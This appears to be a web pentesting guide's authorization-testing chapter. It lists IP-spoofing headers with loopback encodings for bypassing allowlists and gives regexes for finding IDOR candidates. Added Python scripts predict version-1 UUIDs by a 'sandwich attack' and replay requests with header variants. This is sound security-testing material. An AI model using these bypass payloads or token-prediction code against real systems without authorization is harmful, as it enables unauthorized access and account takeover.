The Pentesting Guide

4.5 Authorization Testing

Last updated 6 months ago

4.5.1 Testing Directory Traversal File Include

Search the proxy history (or the crawled URL list) for parameters whose value looks like a file name; these are the first candidates for path traversal and file inclusion payloads:

(?:\?|&)(\w+)=([^&]*\.(?:jpg|jpeg|png|gif|pdf|doc|docx|xls|xlsx|ppt|pptx|txt|zip|rar|mp3|mp4|wav|mov|avi|json|xml|csv|exe|bin|dll|tar|gz|html|css|js|php))\b

Evidence:

4.5.2 Testing for Bypassing Authorization Schema

For every request, change the session identifier from the original to another role's session identifier and evaluate the responses for each (usage of Autorize).

For every request, change the relevant parameters and the session identifier from token one to token two and diagnose the responses for each token (usage of Autorize).

Where access to a function is restricted by source IP, replay the request with each of the headers below set to each of the values below. The values are alternative encodings of the loopback and private addresses (dotted shorthand, hexadecimal, decimal, octal, IPv6 unspecified and IPv4-mapped forms) that naive allowlist checks often fail to normalise. A <COLLABORATOR> hostname (Burp Collaborator) shows whether the server resolves the header value out of band, and https://nip.io/ provides hostnames that resolve to any chosen IP.

Headers:

X-Forwarded-For:
X-Forwarded-IP:
X-Client-IP:
X-Remote-IP:
X-Originating-IP:
X-Host:
X-Client:

Values:

127.0.1
127.1
0.0.0.0
0
0x7f000001
2130706433
3232235521
3232235777
017700000001
[::]
::
[0:0:0:0:0:ffff:127.0.0.1]
0:0:0:0:0:ffff:127.0.0.1
<COLLABORATOR>

Evidence:

4.5.3 Testing for Privilege Escalation

Evidence:

4.5.4 Testing for Insecure Direct Object References

Look for ID numbers:

(?:\?|&)(\w+)=\w*\d+\w*\b

Look for IDs (UUIDs):

(\w+)=[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}

If UUIDs are used, check their version. Because version 1 is based on timestamps, you can perform a sandwich attack: obtain two version-1 UUIDs generated just before and just after the victim's, and enumerate every timestamp in between.

Evidence:
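The three searches above (the file-name parameter pattern from 4.5.1 and the numeric-ID and UUID patterns from 4.5.4) are usually run as Burp Search or grep expressions. The following script, added here as an example and not part of the original guide, applies the same patterns to a list of URLs and reports which parameters are worth testing, with one change in each direction: the numeric-ID pattern gains a capture group around the value so it can be reported, and the UUID pattern is compiled case-insensitively because the page's version only matches lower-case hex. The URLs in SAMPLE_URLS are constructed, not real traffic.

```python
import re

# Patterns as listed on the page: the file-name parameter search (4.5.1) and the two ID searches (4.5.4).
FILE_PARAM = re.compile(
    r"(?:\?|&)(\w+)=([^&]*\.(?:jpg|jpeg|png|gif|pdf|doc|docx|xls|xlsx|ppt|pptx|txt|zip|rar|"
    r"mp3|mp4|wav|mov|avi|json|xml|csv|exe|bin|dll|tar|gz|html|css|js|php))\b"
)
# The page's pattern has no capture group around the value; one is added so the match can be reported.
NUMERIC_ID = re.compile(r"(?:\?|&)(\w+)=(\w*\d+\w*)\b")
# Compiled case-insensitively: many frameworks emit upper-case UUIDs, which the page's pattern misses.
UUID_PARAM = re.compile(
    r"(\w+)=([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})", re.IGNORECASE
)

# Order matters: a UUID contains digits, so without the per-parameter dedup below it would be
# reported a second time as a numeric ID.
CLASSIFIERS = (("file", FILE_PARAM), ("uuid", UUID_PARAM), ("numeric-id", NUMERIC_ID))


def find_candidates(urls):
    """Return (category, parameter, value, url) for every parameter matching one of the patterns.

    Each parameter name is reported once per URL, under the first category that matched.
    """
    found = []
    for url in urls:
        seen = set()
        for category, pattern in CLASSIFIERS:
            for match in pattern.finditer(url):
                param, value = match.group(1), match.group(2)
                if param in seen:
                    continue
                seen.add(param)
                found.append((category, param, value, url))
    return found


# Constructed sample of what a proxy-history export might contain (hypothetical host and paths).
SAMPLE_URLS = [
    "https://target.example/download?file=report.pdf&session=abc",
    "https://target.example/account?user_id=1042",
    "https://target.example/invoice/view?id=3f2a1b2c-9d4e-4f5a-8b6c-7d8e9f0a1b2c",
    "https://target.example/api/orders/view?order=7D8E9F0A-1B2C-4D3E-8F9A-0B1C2D3E4F5A",
    "https://target.example/search?q=hello",
]

if __name__ == "__main__":
    for category, param, value, url in find_candidates(SAMPLE_URLS):
        print(f"{category:10} {param}={value}  ({url})")
```

Each hit is a starting point, not a finding: a file parameter still has to be tested with traversal payloads, and a numeric or UUID parameter has to be re-requested with another user's value (or with the second Autorize token) before it counts as an IDOR.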
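The version check and the sandwich attack from 4.5.4, worked through in code. This is an added example, not the guide's own tooling; it uses only the standard library uuid module. A version-1 UUID is a 60-bit timestamp (100 ns ticks since 1582-10-15) plus a 14-bit clock sequence and a 48-bit node id, so once an attacker holds two tokens issued just before and just after the victim's, the only unknown is the timestamp in between. The generator state (node, clock_seq) and the timestamps in the demonstration are constructed.

```python
import uuid

# 100 ns ticks between the UUID v1 epoch (1582-10-15) and the Unix epoch (RFC 4122 §4.1.4).
UUID_EPOCH_OFFSET = 0x01B21DD213814000


def make_v1(timestamp, clock_seq, node):
    """Build a version-1 UUID from its raw fields: 60-bit timestamp, 14-bit clock_seq, 48-bit node."""
    if not 0 <= timestamp < 1 << 60:
        raise ValueError("timestamp must fit in 60 bits")
    time_low = timestamp & 0xFFFFFFFF
    time_mid = (timestamp >> 32) & 0xFFFF
    time_hi_version = ((timestamp >> 48) & 0x0FFF) | (1 << 12)  # version nibble = 1
    clock_seq_hi_variant = 0x80 | ((clock_seq >> 8) & 0x3F)     # RFC 4122 variant bits 10xxxxxx
    clock_seq_low = clock_seq & 0xFF
    return uuid.UUID(fields=(time_low, time_mid, time_hi_version,
                             clock_seq_hi_variant, clock_seq_low, node))


def describe(value):
    """Version check: the version, and for v1 the decoded timestamp (Unix seconds), clock
    sequence and node, which together say how predictable the identifier is."""
    u = uuid.UUID(str(value))
    info = {"version": u.version}
    if u.version == 1:
        info["unix_seconds"] = (u.time - UUID_EPOCH_OFFSET) / 1e7
        info["clock_seq"] = u.clock_seq
        info["node"] = u.node
    return info


def sandwich_candidates(before, after, max_candidates=1_000_000):
    """Sandwich attack: given v1 UUIDs obtained just before and just after the victim's, return
    every UUID the same generator could have produced in between (every timestamp strictly
    between the two, with the same clock_seq and node)."""
    before, after = uuid.UUID(str(before)), uuid.UUID(str(after))
    for u in (before, after):
        if u.version != 1:
            raise ValueError(f"{u} is not a version-1 UUID; the sandwich attack only applies to v1")
    if (before.clock_seq, before.node) != (after.clock_seq, after.node):
        raise ValueError("clock_seq or node differ: not the same generator state, window unusable")
    if after.time <= before.time:
        raise ValueError("'after' must carry a later timestamp than 'before'")
    span = after.time - before.time - 1
    if span > max_candidates:
        raise ValueError(f"{span} candidates in the window; narrow the sandwich or raise max_candidates")
    return [make_v1(t, before.clock_seq, before.node) for t in range(before.time + 1, after.time)]


if __name__ == "__main__":
    # Constructed scenario: a generator handing out consecutive ticks, with the attacker's two
    # tokens (hypothetical password-reset tokens) enclosing the victim's.
    node, clock_seq = 0x001122334455, 0x1ABC
    base = UUID_EPOCH_OFFSET + 1_700_000_000 * 10_000_000
    attacker_first = make_v1(base, clock_seq, node)
    victim = make_v1(base + 3, clock_seq, node)
    attacker_second = make_v1(base + 5, clock_seq, node)
    print(describe(victim))
    candidates = sandwich_candidates(attacker_first, attacker_second)
    print(len(candidates), "candidates; victim token found:", victim in candidates)
```

The size of the window decides whether this is practical: at full 100 ns resolution one second of separation is ten million candidates, whereas generators that tick per call (as in the constructed scenario) or per millisecond leave only a handful. Check the decoded timestamps of a few freshly issued UUIDs to see which case applies, and remember that every candidate still has to be submitted to the application, so rate limiting on the consuming endpoint is part of the assessment.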

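The header-based bypass from 4.5.2 (replaying a request with each client-IP header set to each encoding of a trusted address and looking for a change in the response) is normally driven from Burp Intruder. The script below is an added example, not the guide's own code: it builds the header/value matrix from the page's lists, sends the baseline request once and each variant once, and reports the variants whose status or body length differs. The sender is injected so the comparison logic runs offline against a constructed allowlist (simulated_allowlist) here; urllib_sender is the real one for an in-scope target. Plain 127.0.0.1 is added to the value list as an assumption, and the Collaborator hostname is a placeholder.

```python
import urllib.error
import urllib.request

# Header names as listed on the page (4.5.2).
BYPASS_HEADERS = [
    "X-Forwarded-For", "X-Forwarded-IP", "X-Client-IP", "X-Remote-IP",
    "X-Originating-IP", "X-Host", "X-Client",
]

# Values as listed on the page: encodings of 127.0.0.1 plus two private addresses
# (3232235521 and 3232235777 are 192.168.0.1 and 192.168.1.1 in decimal).
# Plain "127.0.0.1" is added here as an assumption; the page's list starts at the shorthand forms.
LOOPBACK_VALUES = [
    "127.0.0.1", "127.0.1", "127.1", "0.0.0.0", "0", "0x7f000001", "2130706433",
    "3232235521", "3232235777", "017700000001", "[::]", "::",
    "[0:0:0:0:0:ffff:127.0.0.1]", "0:0:0:0:0:ffff:127.0.0.1",
]


def build_variants(headers=BYPASS_HEADERS, values=LOOPBACK_VALUES, collaborator=None):
    """Every (header, value) pair to try. A Collaborator/OAST hostname, if given, is appended so a
    server that resolves the header value shows up as a DNS or HTTP interaction."""
    values = list(values) + ([collaborator] if collaborator else [])
    return [(header, value) for header in headers for value in values]


def probe(send, base_headers, variants):
    """Send the baseline once, then once per variant with that header added, and return the variants
    whose (status, body_length) differ from the baseline. `send` takes a header dict and returns
    (status, body_length); injecting it keeps the logic testable without network access."""
    baseline = send(dict(base_headers))
    hits = []
    for header, value in variants:
        headers = dict(base_headers)
        headers[header] = value
        response = send(headers)
        if response != baseline:
            hits.append((header, value, response))
    return hits


def urllib_sender(url, method="GET"):
    """Real sender for an in-scope target. 4xx/5xx are returned as results rather than raised,
    because a 403 turning into a 200 is exactly the signal being looked for."""
    def send(headers):
        request = urllib.request.Request(url, headers=headers, method=method)
        try:
            with urllib.request.urlopen(request, timeout=10) as response:
                return response.status, len(response.read())
        except urllib.error.HTTPError as error:
            return error.code, len(error.read())
    return send


def simulated_allowlist(headers):
    """Constructed stand-in for an endpoint that trusts X-Forwarded-For but only recognises two
    spellings of localhost, so the block runs offline."""
    if headers.get("X-Forwarded-For") in ("127.0.0.1", "127.1"):
        return 200, 5120
    return 403, 143


if __name__ == "__main__":
    # Against a real target: probe(urllib_sender("https://target.example/admin"), base, variants).
    base = {"Host": "target.example", "Cookie": "session=low-privilege"}
    variants = build_variants(collaborator="x.collaborator.example")  # placeholder OAST host
    for header, value, (status, length) in probe(simulated_allowlist, base, variants):
        print(f"{header}: {value} -> {status} ({length} bytes)")
```

Status and body length are a coarse diff: an endpoint that reflects the header value into the page changes length for every variant, so confirm each hit by hand and treat a differing length alone as a lead rather than a bypass. Variants that trigger a Collaborator interaction are reported separately by Collaborator, not by this comparison.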